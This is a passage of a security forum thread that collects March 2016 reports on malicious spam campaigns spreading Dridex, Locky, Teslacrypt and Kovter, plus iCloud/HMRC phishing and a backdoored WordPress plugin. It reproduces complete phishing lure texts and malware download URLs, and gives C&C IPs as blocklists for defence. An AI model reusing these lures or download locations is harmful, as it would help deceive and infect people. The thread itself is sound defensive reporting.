2072 replies to this topic

[AplusWebMaster]

FYI...

Fake 'Closing bill' SPAM - xls malware leading to Dridex
- http://myonlinesecur...ding-to-dridex/
4 Mar 2016 - "An email with the subject of 'Closing bill' pretending to come from MyBill <mybill.central@ affinitywater .co.uk> with a malicious Excel XLS spreadsheet attachment is another one from the current bot runs...

Screenshot: http://myonlinesecur...er-1024x755.png

4 March 2016: 54138887_51656_18836.xls - Current Virus total detections 5/56*
 MALWR shows a download from http ://17.rent-shops .ru/system/logs/vbry73f34f.exe (VirusTotal 5/56**)
which looks like Dridex banking Trojan. All the XLS attachments are random names/numbers and all created on the fly. So far I have seen -15- or so all with individual file hashes which doesn’t make it easy.
Other download locations so far discovered include
 http ://2.casino-engine .ru/games/megajack/vbry73f34f.exe | http ://prettymom.ru/system/logs/vbry73f34f.exe |
 http ://shop-bedep .com/system/logs/vbry73f34f.exe | desean .com.sg/system/logs/vbry73f34f.exe ...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1457083098/

** https://www.virustot...sis/1457082565/

- http://blog.dynamoo....ill-mybill.html
4 Mar 2016 - "... Some additional download locations and C&C servers to block, from another source (thank you!)
jean-daniel .com.ua/system/logs/vbry73f34f.exe
namkeendelights .com/system/logs/vbry73f34f.exe
Overall, some of these download locations look like good candidates for blocking, especially:
81.177.140.123 (Avguro Technologies Ltd, Russia)
210.245.90.206 (FPT Telecom Company, Vietnam)
89.184.72.57 (Internet Invest Ltd., Ukraine)
These additional C&C servers have been seen before:
78.108.93.186 (Majordomo LLC, Russia)
87.106.8.177 (1&1, Germany)
91.236.4.234 (FHU Climax Rafal Kraj, Poland)
Recommended blocklist:
188.165.215.180
78.108.93.186
87.106.8.177
91.236.4.234
81.177.140.123
210.245.90.206
89.184.72.57 "
___

Fake 'Remittance' SPAM - malicious .rtf attachment
- http://myonlinesecur...-macro-malware/
4 Mar 2016 - "An email with the subject of 'Remittance' coming from random email addresses, companies and names with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
From: Bridgette – WITAN PACIFIC INVESTMENT TRUST <Cunningham.Bridgette3@ leonduniec .com>
Date: Fri 04/03/2016 10:30
Subject: Remittance
Attachment: rem.advice-3798605447.rtf
    Dear Sir/Madam,
    Hope you are well. I am writing you to let you know that full amount specified in the contract has been paid into your bank account on the 1st of March at 14 through BACS payment system and should reach the destination (beneficiary’s) account within 3 working days.
    To see full payment details please refer to the remittance advice note attached to the letter.
    Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as     soon as possible. Please do not hesitate to write us.
    Bridgette Cunningham ...

4 March 2016: rem.advice-3798605447.rtf - Current Virus total detections 2/56*
 MALWR is unable to detect any HTTP connection or download any malware, that is probably due to an anti-analysis protection in the word doc RTF. It will almost certainly turn out to download Dridex banking trojan, Locky or another similar ransomware..
Update: Dynamoo[1] has posted some locations for the downloads which appear to be Dridex banking Trojan..
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1457091062/

1] http://blog.dynamoo....rom-random.html
4 Mar 2016 - "This fake financial spam appears to come from random companies. The body text is similar in all cases.
Sample 1:     From:    Ignacio - Floris of London
    Date:    4 March 2016 at 09:42
    Subject:    Remittance
    Dear Sir/Madam,
    I hope you are well. I am writing you to let you know that total amount qualified in the contract has been sent to your bank account on the 3rd of March at 14 through BACS payment system and should reach the destination (beneficiary's) account within 3 working days.
    To see full payment details please refer to the remittance advice note attached to the letter
     Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as      soon as possible. Please do not hesitate to write us.
    Ignacio Knox
    Accounts Payable

... This is the -same- IP as seen here* which Sophos identified as being Dridex.  
Recommended blocklist:
31.131.24.76
24.172.94.181 "
* https://www.sophos.c...d-analysis.aspx
___

The Rules Of Spam ...
- http://bruce.pennypa...-rules-of-spam/
"... Rule #1: Spammers lie...
...  Rule #2: If a spammer seems to be telling the truth, see Rule #1..."
ref via: http://blog.dynamoo.com/
___

New Macro Malware - Uses Forms to Store its Code
- http://blog.trendmic...rms-store-code/
Mar 3, 2016 - "The resurgence and continued prevalence of macro malware could be linked to several factors, one of which is their ability to -bypass- traditional antimalware solutions and sandboxing technologies. Another factor is the continuous enhancements in their routines: just recently, we observe that the macro malware related to DRIDEX and the latest crypto-ransomware variant, Locky ransomware, used Form object in macros to obfuscate the malicious code. With this improvement, it could further aid cybercriminals or attackers to -hide- any malicious activity they perform in their target network or system... Locky ransomware, which is reported to be responsible for compromising the network and encrypting the records of Hollywood Presbyterian Medical Center last February 2016, is the first instance of ransomware that capitalized on malicious macros to infiltrate systems. Typically, ransomware is distributed via compromised websites or spam emails. However, this -variant- deviated and replicated this behavior (use of macros) commonly seen in DRIDEX. Based on our Smart Protection Network data, the top countries by Locky ransomware are Germany, Japan, and the United States:
Top countries affected by Locky ransomware for the past 3 months
> https://blog.trendmi...ky-1024x596.png
DRIDEX, a prevalent online banking malware has its own macro downloader. When we’re conducting our analysis, we found out that most of our DRIDEX detections pertain to its macro downloader and -not- the actual TSPY_DRIDEX. This could suggest that this threat is -still- rampant as ever despite the takedown of some of its command-and-control (C&C) servers last year.
Countermeasures... awareness of such threats and their behavior is one of the initial steps in order to combat their risks. It’s also important to -not-enable-macros- from email attachments as this can add another layer of protection to prevent the download of malicious files on the system. For enterprises or organizations, it may be best to block email messages with attachments from suspicious sources."
(More detail at the trendmicro URL at the top of this post.)
 

  

Edited by AplusWebMaster, 05 March 2016 - 09:20 AM.

[AplusWebMaster]

FYI...

Fake 'Customer Invoice' SPAM - JS malware Teslacrypt
- http://myonlinesecur...-to-teslacrypt/
5 March 2016 - "An email with the subject of Invoice, Ref. 00278908' [random numbered] pretending to come from random email addresses and names with a zip attachment is another one from the current bot runs...
The email looks like:
From: Derrick bolton <boltonDerrick32@ kgorman .ca>
Date: Sat 05/03/2016 07:38
Subject: Invoice, Ref. 00278908
Attachment: Invoice_ref-00278908.zip
Dear Valued Customer,
We are very grateful for your purchase. The specified sum of $679,48 was paid and now your order is being processed by our company.
Delivery information and the invoice can be found in the attached file.
Thank you!
Derrick bolton
Sales Manager ...


5 March 2016 : Invoice_ref-00278908.zip: Extracts to: invoice_ZAwuzp.js (I have seen -4- different zip files by # all extracting to -different- js files) VirusTotal detections [1] [2] [3] [4] all of which according to MALWR [a].. contact http ://ujajajgogoff .com/80.exe?1 where they actually download a file called 69... This site was distributing Teslacrypt ransomware earlier in the week, so this is likely to be the same. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
1] https://www.virustot...sis/1457036665/

a] https://malwr.com/an...mM0ZWJhYTM2MDA/
74.117.183.252
>> https://www.virustot...b138c/analysis/

- https://isc.sans.edu...l?storyid=20801
Last Updated: 2016-03-05 - "We have seen in the last two weeks a massive amount of websites hosting a variant of angler exploit kit that infects computers downloading and activating a variant of teslacrypt... Please keep in mind some countermeasures to avoid infection by Angler EK or ransomware:
• Implements strong antispam, antimalware and antiphishing procedures.
• Keep operating systems patched against known vulnerabilities.
• Install patches from vendors as soon as they are distributed, after performing a full test procedure for each patch.
• Train your users to be careful when opening attachments.
• Configure antimalware software to automatically scan all email and instant-message attachments.
• Configure email programs to do not automatically open attachments or automatically render graphics.
• Ensure that the preview pane of your e-mail reader is turned off.
• Use a browser plug-in like noscript to block the execution of scripts and iframes."
___

iCloud PHISH
- http://myonlinesecur...cloud-phishing/
5 March 2016 - " 'i215061438' pretending to come from Online-iApple <replyonline@ online .apple .org> is one of the latest -phish- attempts to steal your Apple/iCloud account. This one only wants your 'iCloud/Apple email address log in and password...

Hello [REDACTED]
You received one new message!
SignIn and View
Where we can provide information access and correction, we will do so for free, except where it would require a disproportionate effort. We aim to maintain our services in a manner that protects information from accidental or malicious destruction. Because of this, after you delete information from our services, we may not immediately delete residual copies from our active servers and may not remove information from our backup systems.
Thank you,
The iApple Team

... It is quite easy to mistake-the-URL for a genuine apple site because you are instinctively drawn to the http ://icloudapple .com at the -start- of the URL, where you should be looking at the last-part before the first - otrack .net .. That clearly is -not- an Apple or iCloud site. If did click the link you would see a webpage looking like this where any email address and password gives you a message saying: 'Your Apple ID or password was incorrect. Forgot password?' .. which is the link to the genuine Apple forgot password site:
> http://myonlinesecur...ng-1024x549.png
The links behind the unsubscribe and 'Click here to view our privacy policy' lead you to the Romanian Security Team forum. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."

otrack .net: 192.185.195.163 >> https://www.virustot...2cd26/analysis/

 

  

Edited by AplusWebMaster, 05 March 2016 - 10:24 AM.

[AplusWebMaster]

FYI...

HMRC Tax Refund/iCloud PHISH
- http://myonlinesecur...ishing-attempt/
6 Mar 2016 - "A right mishmash of an email with this HMRC tax phishing attempt. The bots sending these are very confused this morning. The email subject says 'Tax Refund New Message Alert!' but the body is all about an iCloud log in... The email looks like:
From: HM & Customs <1Message@ HMRC .gov.uk>
Date: Sun 06/03/2016 04:50
Subject: Tax Refund New Message Alert!
Attachment: none
    Your ID was used to sign in to App Store  via a web browser.
    Date and Time: March 04, 2016, 14:03 PM PDT
    If you have not signed in to iCloud  recently and believe someone may have accessed your account, you should verify your identity and change your password. Sign in to  HMRC online Services
    Hm & Customs  respects your privacy.

The link behind the 'Sign in to' leads to http ://chefom .com/hmrc .gov.uk/8a9e617ee9a73ddf31d5b21bd3ef46ba/index.php which is known by Internet Explorer Smart filter as well as Chrome and Firefox phishing filters and blocked. There no doubt will be other sites using the same email template that aren’t yet blocked. If you are unwise enough to follow-the-links and have anti-phishing or smart filter turned off, then you see a typical HMRC phishing page which looks very similar to a HMRC genuine page:
> http://myonlinesecur..._HMRC_phish.png "

chefom .com: 192.186.242.105: https://www.virustot...05/information/
>> https://www.virustot...361b2/analysis/
 

 

[AplusWebMaster]

Fake 'Order Confirmation', 'Appear in Court', 'DHL invoice', 'payment proof' SPAM, WordPress plugin backdoor,
Payroll and Human Resources - PHISH
 

FYI...

Fake 'Order Confirmation' SPAM - ransomware
- http://blog.dynamoo....on-payment.html
7 Mar 2016 - "This -fake- financial spam comes from various senders with different references, amounts and slightly different addresses. There is a malicious attachment which appears to be ransomware.
    From:    Ellen thorp
    Date:    7 March 2016 at 07:08
    Subject:    Order Confirmation - Payment Successful, Ref. 81096454
    Dear Client,
    Thank you for your transaction of $477,84. The shipping time varies from 3 to 5 business days, however we will do our best so you can receive your order as soon as possible.
    We will send all the information regarding this case to your local post office. They will contact the phone number you provided when the package arrives.
    Double check please the document enclosed to this email.
    Thank you for your order and we hope to see you again as our customer.
    Respectfully,
    Ellen thorp
    Chief Accountant ...

Attached is a randomly-named ZIP file in the format Invoice_ref-81096454.zip which contains a further malicious script file beginning with invoice_, invoice_copy or invoice_SCAN. Detection rates for these vary [1]... These Hybrid Analysis reports on three of the samples [2].. show the script download a malicious binary from:
blablaworldqq .com/80.exe?1
hellomydearqq .com/69.exe?1
hellomydearqq .com/80.exe?1
At the moment, those domains don't seem to be resolving, but if you replace the domains with the IP addresses then it will work. The sites are hosted on the following servers:
51.254.226.223 (OVH, France)
173.82.74.197 (Multacom Corporation, US)
The 69.exe and 80.exe files are actually different, both have a detection rate of 4/54 [3]... Analysis of these files [4]... indicates behaviour consistent with ransomware, and these binaries attempt to phone home...
Recommended blocklist:
51.254.226.223
173.82.74.197
conspec .us
tmfilms .net
iqinternal .com
goktugyeli .com
saludaonline .com "
1] https://www.virustot...sis/1457338902/

2] https://www.hybrid-a...environmentId=4

3] https://www.virustot...sis/1457338902/

4] https://malwr.com/an...GU5MmJlODc4OTQ/

- http://myonlinesecur...ypt-ransomware/
7 Mar 2016 - "An email with the subject of 'Order Confirmation – Payment Successful, Ref. 67703560" [random numbered] pretending to come from random email addresses, companies and names with a zip attachment is another one from the current bot runs... The name of the alleged sender matches the name of the Chief Accountant. The ref number in subject matches the attachment number. The email looks like:
From: Amie yonk <yonkAmie092@ bumperscuffshrewsbury .co.uk>
Date: Mon 07/03/2016 05:56
Subject: Order Confirmation – Payment Successful, Ref. 67703560 (random numbers)
Attachment: Invoice_ref-67703560.zip
Dear Client,
Thank you for your transaction of $727,71. The shipping time varies from 3 to 5 business days, however we will do our best so you can receive your order as soon as possible.
We will send all the information regarding this case to your local post office. They will contact the phone number you provided when the package arrives.
Double check please the document enclosed to this email.
Thank you for your order and we hope to see you again as our customer.
Respectfully,
Amie yonk
Chief Accountant ...

7 March 2016: Invoice_ref-67703560.zip: Extracts to: invoice_zVVGbu.js - Current Virus total detections 2/56*
 MALWR** shows a download from http ://hellomydearqq .com/69.exe?1 so that tells us that this is Teslacrypt ransomware (VirusTotal 2/56***).. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457330191/

** https://malwr.com/an...jU2ZjI1MDg4MzM/
Hosts
173.82.74.197
50.62.245.1

*** https://www.virustot...sis/1457333744/
___

Fake 'Notice to Appear in Court' SPAM - JS malware leads to Kovter and ransomware
- http://myonlinesecur...and-ransomware/
7 Mar 2016 - "An email with the subject of 'Notice to Appear in Court' coming from no-reply@ mailout .pl with a zip attachment is another one from the current bot runs... The email looks like:
From: no-reply@ mailout .pl
Date: Mon 07/03/2016 10:19
Subject: Notice to Appear in Court
Attachment: Notice_to_Appear_00736595.zip
Notice to Appear,
You have to appear in the Court on the March 15.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
The copy of Court Notice is attached to this email.
Sincerely,
Adam Middleton,
Court Secretary.

7 March 2016: Notice_to_Appear_00736595.zip: Extracts to: Notice_to_Appear_00736595.doc.js - Current Virus total detections 15/56*
.. MALWR** shows a download of -3- files from http ://mehulic-art .com which are known as Kovter, and other ransomware files. VirusTotal [1] [2] [3].. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457346335/

** https://malwr.com/an...jBjYmUwMWZhNjg/
Hosts
185.58.74.132

1] https://www.virustot...sis/1457304422/

2] https://www.virustot...sis/1457346993/

3] https://www.virustot...sis/1457285169/
___

Fake 'DHL invoice' SPAM - JS malware leads to Locky Ransomware
- http://myonlinesecur...cky-ransomware/
7 Mar 2016 - "An email with the subject of 'Your latest DHL invoice: HSC4387902' [random numbered] pretending to come from e-billing@ dhl .com with a zip attachment is another one from the current bot runs which downloads Locky ransomware...

Screenshot: http://myonlinesecur...02-1024x551.png

7 March 2016: HSC4387902.zip: Extracts to: MNB3492495814.js - Current Virus total detections 1/54*
.. MALWR** shows a download of the -same- Locky ransomware version as mentioned in THIS post*** from http ://shapes .com.pk/system/logs/87tg7v645c.exe
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457349592/

** https://malwr.com/an...zJiMjFiOGFlYmE/
Hosts
50.87.248.127

*** http://myonlinesecur...cky-ransomware/
___

Fake 'payment proof' SPAM - JS malware leads to Locky Ransomware
- http://myonlinesecur...cky-ransomware/
7 Mar 2016 - "An email with the subject of 'payment proof' pretending to come from SunBeverages <Info@ sunbeverages .eu> with a zip attachment is another one from the current bot runs... The email looks like:
From: SunBeverages <Info@ sunbeverages .eu>
Date: Mon 07/03/2016 09:42
Subject: payment proof
Attachment: 169990489_0492729.zip (random numbers)
    Please see attached proof of payment...

5 March 2016: 169990489_0492729.zip: Extracts to: SPL6767845811.js - Current Virus total detections 1/57*
.. MALWR** shows a download of Locky ransomware from http ://aqarhits .com/system/logs/87tg7v645c.exe
(VirusTotal 4/56***).. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457347704/

** https://malwr.com/an...GE4MmU0ZTc4NGM/
Hosts
162.210.102.210
46.108.39.18

*** https://www.virustot...sis/1457348069/
TCP connections
212.47.223.19: https://www.virustot...19/information/
___

Fake 'E-Service Invoice' SPAM - leads to malware
- http://blog.dynamoo....europe-ltd.html
7 Mar 2016 - "This -fake- financial spam leads to malware:
    From     Andrew Williams [andrew.williams@ eurocoin .co.uk]
    Date     Mon, 07 Mar 2016 17:37:49 +0530
    Subject     E-Service (Europe) Ltd Invoice No: 10013405
    Dear Customer,
    Please find your invoice attached from E-Service (Europe) Ltd. We kindly ask you
    to make payment for all transactions on or before their due date.
    Please contact E-Service (Europe) if you have any issues or queries preventing your
    prompt payment ...

Attached is a ZIP file named Invoice 10013405.zip which contains one of a wide range of randomly-named scripts. A trusted third party analysis (thank you!) shows that there are download locations.. The dropped binary has a detection rate of 5/56* and the Malwr report** clearly shows this is the Locky ransomware. My contact reports that the malware phones home to:
192.121.16.196 (EDIS, Netherlands)
46.108.39.18 (EDIS, Romania)
212.47.223.19 (Web Hosting Solutions OY, Estonia)
109.237.111.168 (Krek Ltd, Russia)
185.92.220.35 (Choopa LLC, Netherlands)
89.108.85.163 (Agava Ltd, Russia)
192.71.213.69 (EDIS, Spain)
Recommended blocklist:
192.121.16.196
46.108.39.18
212.47.223.19
109.237.111.168
185.92.220.35
89.108.85.163
192.71.213.69 "

- http://myonlinesecur...cky-ransomware/
7 Mar 2016 - "An email with the subject of 'E-Service (Europe) Ltd Invoice No: 10013405' [random numbered]  pretending to come from Andrew Williams <andrew.williams@ eurocoin .co.uk> with a zip attachment is another one from the current bot runs which downloads LOCKY RANSOMWARE.. The email looks like:
From: Andrew Williams <andrew.williams@ eurocoin .co.uk>
Date: Mon 07/03/2016 11:39
Subject:  E-Service (Europe) Ltd Invoice No: 10013405  ( random numbers)
Attachment: Invoice 10013405.zip
    Dear Customer,
    Please find your invoice attached from E-Service (Europe) Ltd. We kindly ask you to make payment for all transactions on or before their due date...

7 March 2016: Invoice 10013405.zip: Extracts to: YOJ5879833117.js - Current Virus total detections 2/54*
.. MALWR** shows a download of Locky ransomware from http ://kiddyshop.kiev .ua/image/data/87tg7v645c.exe (VirusTotal 5/54***) Which is slightly different to today’s earlier versions. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457354372/

** https://malwr.com/an...2QzMzNjMmU5ZWU/
Hosts
176.114.0.200
185.92.220.35

*** https://www.virustot...sis/1457355960/
TCP connections
192.121.16.196: https://www.virustot...96/information/
___

WordPress plugin opens backdoor, steals user credentials
- https://www.helpnets...er-credentials/
Mar 7, 2016 - "If you are one of the 10,000+ users of the 'Custom Content Type Manager (CCTM)' WordPress plugin, consider your site to be compromised and proceed to clean your installation up, Sucuri Security researchers have warned. After finding “a very suspicious auto-update.php file inside wp-content/plugins/custom-content-type-manager/ during the cleanup on an -infected- WP site, the researchers have begun digging, and discovered that:
• The file in question is a backdoor that can download additional files from a third-party domain, and save them in the plugin directory
• The CCTM plugin has been available for download from the official WP Plugin Directory for around three years, but hasn’t been updated in the last 10 months. But, some two weeks ago, a new developer (“wooranker”) started -adding- “small tweeks by new owner” and “bug fixes”... Users who want to keep using the plugin are advised revert to using version 0.9.8.6. and to -disable- automatic plugin updates."
> https://blog.sucuri....n-goes-bad.html
Updated Mar 7, 2016
(More detail at both URLs above.)
___

Payroll and Human Resources - PHISH
- https://www.helpnets...-employee-data/
Mar 7, 2016 - "... 'Because a W-2 form provides the employee’s name, Social Security number, address, and earnings information for the year with how much had been deducted for taxes, etc. – as well as the employer’s name and address – it provides everything criminals need to engage in tax refund fraud', Dissent, the privacy advocate running the Office of Inadequate Security blog*, explains. 'It used to be that in February and March, we’d see a number of reports-of-breaches involving employees’ W-2 tax statements that were due to printing or mailing errors. This year, we’re seeing reports of W-2 data-theft -via- phishing'. The blogger has been flagging reports of various companies being successfully targeted with this type of attack: Actifio, AmeriPride, Evening Post Industries, GCI, Main Line Health, and the latest, Seagate. Snapchat was hit earlier this month. And there are likely many more... instead of going directly after the money, the attackers are after information that can be used for stealing money. The fake emails almost always seem to be coming from the firm’s -CEO- asking the payroll -or- HR employee to send the employees’ W-2 forms, in PDF form, 'for review'... we can expect a continuing, steady stream of these emails hitting all types of companies. It remains on them to educate their staff so they don’t fall for it."
* http://www.databreac...ictims-in-2016/
Mar 7, 2016
 

 

Edited by AplusWebMaster, 07 March 2016 - 03:13 PM.

[AplusWebMaster]

FYI...

Fake 'Pay_Advice_Vendor' SPAM - JS malware leads to Dridex
- http://myonlinesecur...eads-to-dridex/
8 Mar 2016 - "An email with the subject of PayPay_Advice_Vendor_0000300320_1000_for_03.03.2016' pretending to come from Accounts Payable <vendoramendments@ yorkshirewater .co.uk> with a zip attachment is another one from the current bot runs which downloads Dridex banking Trojan... The email looks like:
From: Accounts Payable <vendoramendments@ yorkshirewater .co.uk>
Date: Tue 08/03/2016 08:25
Subject: Pay_Advice_Vendor_0000300320_1000_for_03.03.2016
Attachment: Pay_Advice_Vendor_0000300320_1000_for_03.03.2016.PDF.ZIP
    Spotted a leak?
    If you spot a leak please report it immediately. Call us ...  
    Get a free water saving pack
    Don’t forget to request your free water and energy saving pack, it could save you money on your utility bills and help you conserve water..

8 March 2016: Pay_Advice_Vendor_0000300320_1000_for_03.03.2016.PDF.ZIP: Extracts to: LQO1169369605.js
Current Virus total detections 4/56*.. MALWR shows a download of what looks like Dridex banking Trojan from http ://reclamus .com/9uj8n76b5.exe (VirusTotal 2/56**). Other download locations so far discovered include
lhs-mhs .org/9uj8n76b5.exe | jatukarm-30 .com/9uj8n76b5.exe | stopmeagency.free .fr/9uj8n76b5.exe ... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457426128/

** https://www.virustot...sis/1457426412/
TCP connections
38.64.199.3: https://www.virustot....3/information/
8.253.82.126: https://www.virustot...26/information/

- http://blog.dynamoo....0003003201.html
8 Mar 2016 - "This -fake- financial spam does not come from Yorkshire Water but is instead a simple -forgery- with a malicious attachment.
    From     Accounts Payable [vendoramendments@ yorkshirewater .co.uk]
    Date     Tue, 08 Mar 2016 10:32:52 +0200
    Subject     Pay_Advice_Vendor_0000300320_1000_for_03.03.2016
    Spotted a leak?
    If you spot a leak please report it immediately. Call us...
    Get a free water saving pack
    Don't forget to request your free water and energy saving pack, it could save you
    money on your utility bills and help you conserve water...

I have only seen a single sample with an attachment named Pay_Advice_Vendor_0000300320_1000_for_03.03.2016.PDF.ZIP which contains a randomly-named malicious script with a detection rate of 3/54*. According to the Malwr report** and Hybrid Analysis*** on this sample, it downloads a malicious binary from:
lhs-mhs .org/9uj8n76b5.exe
This binary has a detection rate of 2/54[4] and all those reports indicate that it phones home to:
38.64.199.3 (PSINet, Canada)
I recommend that you -block- traffic to that IP. The Malwr report on the dropped binary is inconclusive, but it looks like the Dridex banking trojan."
* https://www.virustot...sis/1457426440/

** https://malwr.com/an...zJkMjlkOGZlOTk/
Hosts
208.131.141.2
38.64.199.3
184.25.56.34

*** https://www.hybrid-a...environmentId=4

4] https://www.virustot...sis/1457426850/
TCP connections
38.64.199.3: https://www.virustot....3/information/
8.253.82.126: https://www.virustot...26/information/
___

Fake 'Emailing' SPAM - JS attachment leads to Dridex
- http://myonlinesecur...eads-to-dridex/
8 Mar 2016 - "An email with the subject of 'Emailing: 20121005154449756' pretending to come from Gary Atkinson <Gary@ garrardwindows .co.uk> with a zip attachment is another one from the current bot runs which downloads Dridex banking Trojan... The email looks like:
From: Gary Atkinson <Gary@ garrardwindows .co.uk>
Date: Tue 08/03/2016 09:00
Subject: Emailing: 20121005154449756
Attachment:
    Please find attached document as requested.

8 March 2016:20121005154449756.zip: Extracts to: UIP3776229406.js - Current Virus total detections 3/56*
 MALWR** shows a download of Dridex banking Trojan from http ://lhs-mhs .org/9uj8n76b5.exe
(VirusTotal ***) which is the same binary as THIS post[4]... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457427965/

** https://malwr.com/an...TJlNDVkOWEyNzE/
Hosts
208.131.141.2
38.64.199.3
8.254.249.78

*** https://www.virustot...sis/1457427628/
TCP connections
38.64.199.3: https://www.virustot....3/information/
8.253.82.126: https://www.virustot...26/information/

4] http://myonlinesecur...eads-to-dridex/

- http://blog.dynamoo....5154449756.html
8 Mar 2016 - "This spam does -not- come from Garrard Windows but is instead a simple -forgery- with a malicious attachment:
    From     Gary Atkinson [Gary@ garrardwindows .co.uk]
    Date     Tue, 08 Mar 2016 12:09:33 +0300
    Subject     Emailing: 20121005154449756
    Please find attached document as requested.

Attached is a file 20121005154449756.zip which contains a randomly-named script. I have seen two samples so far (VirusTotal results [1]..). The Malwr reports [3].. show the script downloads from the following locations:
jatukarm-30 .com/9uj8n76b5.exe
stopmeagency .free.fr/9uj8n76b5.exe
The downloaded binary appears to be Dridex and is the -same- as found in this spam run*."
1] https://www.virustot...sis/1457429537/

2] https://malwr.com/an...DhlYzdmYWIyYWI/
Hosts
203.146.251.198
38.64.199.3
23.216.11.120

* http://blog.dynamoo....0003003201.html
___

Fake 'Order' SPAM - doc malware leads to Dridex
- http://myonlinesecur...eads-to-dridex/
8 Mar 2015 - "An email with the subject of 'Order 1307605 (Acknowledgement)' pretending to come from rick.adrio@ booles .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
From: rick.adrio@ booles .co.uk
Date: Tue 08/03/2016 09:31
Subject: Order 1307605 (Acknowledgement)
Attachment: pm51A.docm
    Please find document attached ...

8 March 2016: pm51A.docm Current Virus total detections 5/55*
 MALWR** shows a download of Dridex banking Trojan from http ://kyudentyumi .web .fc2 .com/9uj8n76b5.exe
... which is the -same- Dridex Trojan version as described in today’s earlier posts where they are using .JS files inside zips to distribute the malware... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1457430327/

** https://malwr.com/an...TVkOGE3OTZhOTM/
Hosts
208.71.106.45
38.64.199.3
23.216.11.120

- http://blog.dynamoo....er-1307605.html
8 Mar 2015 - "This fake financial spam has a malicious attachment:
    From     rick.adrio@ booles .co.uk
    Date     Tue, 08 Mar 2016 15:58:07 +0530
    Subject     Order 1307605 (Acknowledgement)
    Please find document attached ...

Attached is a file pm51A.docm which I have seen two versions of (VirusTotal results [1] [2]). According to these Malwr reports [3] [4] and various other sources the macro in the document downloads from:
stopmeagency .free.fr/9uj8n76b5.exe
reclamus .com/9uj8n76b5.exe
lhs-mhs .org/9uj8n76b5.exe
izzy-cars .nl/9uj8n76b5.exe
kyudentyumi.wekyudentyumi .web.fc2 .com/9uj8n76b5.exe
The dropped binary has -changed- from earlier and has a detection rate of 2/55*, it phones home to the -same- IP address as seen in this campaign**. It appears to be the Dridex banking trojan."
1] https://www.virustot...sis/1457433767/

2] https://www.virustot...sis/1457433778/

3] https://malwr.com/an...jA5YTlmMzFiYmQ/
Hosts
46.235.47.134
38.64.199.3
13.107.4.50

4] https://malwr.com/an...Dg2ODFhZGY1MmE/
Hosts
208.131.141.2
38.64.199.3
13.107.4.50

* https://www.virustot...a5874/analysis/
TCP connections
38.64.199.3: https://www.virustot....3/information/
131.253.33.50: https://www.virustot...50/information/

** http://blog.dynamoo....0003003201.html
___

Fake 'FeDex-service' SPAM - malicious attachment
- http://blog.dynamoo....gent-fedex.html
8 Mar 2016 - "This -fake- FedEx spam has a malicious attachment:
    From:    FeDex-service
    Date:    8 March 2016 at 11:40
    Subject:    Samson Floyd agent Fedex
    Dear [redacted],
    We attempted to deliver your item on March 07th, 2016, 11:40 AM.
    The delivery attempt failed because the address was business closed or
    nobody could sign for it. To pick up the parcel,please, print the receipt
    that is attached to this email and visit Fedex office indicated in the
    invoice. If the package is not picked up within 48 hours, it will be returned
    to the shipper.
    Label: US45928402845 ...

Attached is a RAR archive file in this case named US45928460284.rar containing in turn a malicious script US45928460284.js ... This attempts to download an executable from:
www .fotoleonia .it/files/sample.exe
This has a VirusTotal detection rate of 4/54*. The Malwr report** shows a subsequent download from:
www .claudiocalaprice .com/modules/fedex/pad.exe
This has similar detections*** to the first binary. That Malwr report also indicates the binary POSTing data to:
pdf.repack .bike/new_and/state.php
This is hosted on:
151.80.76.200 (Kitdos, US / OVH, France)
I would suggest that the -entire- 151.80.76.200/29 range is questionable and should be -blocked-. None of the automated tools I ran... gave any insight as to what the malware does, but it is clearly something malicious."
* https://www.virustot...sis/1457437544/

** https://malwr.com/an...DZhMGMxMDQyNzU/
Hosts
78.83.32.3
172.217.3.35
172.217.0.67
62.149.142.172
129.70.132.34
8.8.4.4
23.100.122.175
151.80.76.200
62.149.142.151

*** https://www.virustot...sis/1457438147/
___

Fake 'Compensation' SPAM - JS malware leads to Locky Ransomware
- http://myonlinesecur...cky-ransomware/
8 Mar 2016 - "An email with the subject of 'Compensation – Reference Number #242852' [random numbered]  coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads Locky Ransomware... The email looks like:
From: Lily Adams <AdamsLily33@ haleandheartymovers .com>
Date: Tue 08/03/2016 12:00
Subject: Compensation – Reference Number #242852
Attachment: SCAN_00_242852.zip
    Dear Customer,
    The mistake made will be compensated promptly, please do not worry.
    Please take a look at the file attached (scanned document) as it contains all the information.
    Sincerely,
    Lily Adams
    Sales Manager ...

